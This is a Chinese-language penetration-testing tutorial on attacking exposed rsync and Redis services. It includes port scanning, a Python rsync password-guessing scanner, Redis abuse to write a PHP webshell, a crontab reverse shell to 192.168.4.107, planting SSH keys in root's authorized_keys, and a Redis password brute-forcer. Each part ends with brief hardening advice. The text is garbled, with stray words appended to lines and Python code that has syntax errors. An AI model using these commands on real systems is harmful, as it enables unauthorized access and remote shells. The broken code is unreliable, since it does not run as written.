3.2.1 Rsync
3.2.2 Python編寫rsync掃描器
3.3 Redis
Rsync
Rsync介紹php
•Rsync(remote synchronize)是一款實現遠程同步功能的軟件,它在同步文件的同時,能夠保持原來文件的權限、時間、軟硬連接等附加信息。html
•rsync 默認同步時是不加密的,可以使用 ssh隧道 的方式來進行加密同步git
默認端口:873github
配置參數redis
錯誤的配置參數shell
案例數據庫
我是如何淪陷ChinaZ下載站服務器的安全
http://www.anquan.us/static/bugs/wooyun-2013-026232.htmlbash
漏洞掃描與發現服務器
nmap -n --open -p 873 X.X.X.X/24
<php phpinfo(); ?>
rsync test.php 192.168.5.133::bak/hacker.php
修復
限定訪問的IP
不容許匿名訪問
防止弱口令
禁用root權限
Python編寫rsync掃描器
Python編寫批量掃描
需求
掃描開放的873端口
獲取rsync目錄
密碼嘗試
代碼
import os
import datetime
import threading
from socket import *
def save_file(result):
create\_file\_name = datetime.datetime.now().strftime('%Y-%m-%d')
new\_file = ‘{}\_open.txt’.format(create\_file\_name)
with open(new_file,'a+') as fd:
fd.writelines(result + '\\n')
def socket_request(tarip,tarport);
try:
timeout = 2
setedfaulttimeout(timeout)
s = socket(af\_INET,SOCK\_STREAM)
address = (str(tarip),int(tarport))
s.connect(address)
s.close()
info = ‘{}:{} Open’.format(tarip,tarport)
print('\\033\[6;30;42m' + '\\033\[0m')
save_file(tarip)
yield info
except:
print('\\033\[0;31m' + '{}:{} {}'.format(tarip,tarport,'Close') + '\\033\[0m')
def port\_open\_scan():
with open('ip.txt','r') as read_ip:
tarport = 873
for ip in read_ip
target_ip = ip.strip()
socket_request(ip,tarport)
for x in socket\_request(target\_ip,tarport):
pass
def rsync\_pass\_check(ip):
ip = ip.strip()
command = "rsync" + "::"
print("Checking {}".fjormat(ip))
dirlist = \[\]
for line in os.popen(command):
x = line.find("\\t")
y = line\[0:x\]
dirlist.append(y)
for dir in dirlist:
userlist = \["www","root","test"\]
for user in userlist:
crack\_command = "rsync " + user + "@" + ip + "::" + dir + 「--password\_file=pass.txt」
try:
output = os.system(crack_command)
if os.popen(crack_command).read():
res\_str = "\[+\] Vul Found: " + crack\_command
with open("Vuln_IP.txt","a+") as f:
f.write(res_str+"\\n")
else:
pass
except Exception as e:
print(e)
def main():
port\_open\_scan()
open\_port = '{}\_open.txt'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
with open(open_port,'r') as f:
iplist = f.readlines()
for ip in iplist:
rsync\_pass\_check(ip)
if \_\_name\_\_ == '\_\_main\_\_'
t = threading.Thread(target=main)
t.start()
Redis
Redis安全事件
redis是一個開源、支持網絡、基於內存、鍵值對存儲數據庫,使用ANSI C編寫。
自從Redis未受權問題獲取Linux系統root權限的攻擊方法的披露後,因爲其易用性,利用該問題入侵Linux服務進行挖礦
安全事件
鳳凰網某站點redis未受權訪問致使Getshell
http://www.anquan.us/static/bugs/wooyun-2015-0161323.html
Redis默認安裝
wget https://codeload.github.com/antirez/redis/tar.gz/2.8.21
make
make install
cp -p redis.conf /etc/
redis-server /etc/redis.conf
未受權訪問獲取Shell
獲取WebShell
條件:網站路徑
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
寫入crontab任務
set x "\n* * * * * bash -i >& /dev/tcp/192.168.4.107/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
Save
Attack: nc –lvnp 6666
寫入ssh公鑰
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.4.1 -x set crack
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
Save
ssh -i id_rsa root@192.168.4.1
Python爆破Redis
代碼
from socket import *
ip = '192.168.4.106'
port = 6379
timeout =2
setdefaulttimeout(timeout)
s= socket(AF\_INET,SOCK\_STREAM)
s.connect((ip,int(port)))
s.send(b"INFO\\r\\n")
result = s.recv(1024)
if b"redis_version" in result:
print("未受權訪問")
elif b"Authentication" in result:
with open('pass.txt','r') as read_pass:
for password in read_pass:
password = password.strip()
s = socket(AF\_INET,SOCK\_STREAM)
s.connect((ip,int(port)))
s.send("AUTH {}\\r\\n".format(password).encode('utf-8'))
result = s.recv(1024)
if b'+OK' in result:
print("密碼: {}".format(password))
修復
1.設置密碼
redis.conf中添加
requirepass 123qwqwdg23
2.不要把Redis暴露再公網
3.普通權限啓動
user add -r redis
chown -R redis:redis /usr/local/redis/
su redis
redis-server /etc/redis.conf
4.對.ssh降權和鎖定
su - redis
chmod 400 .ssh/authorized_keys
chatter +i .ssh/authorized_keys
chatter +i .ssh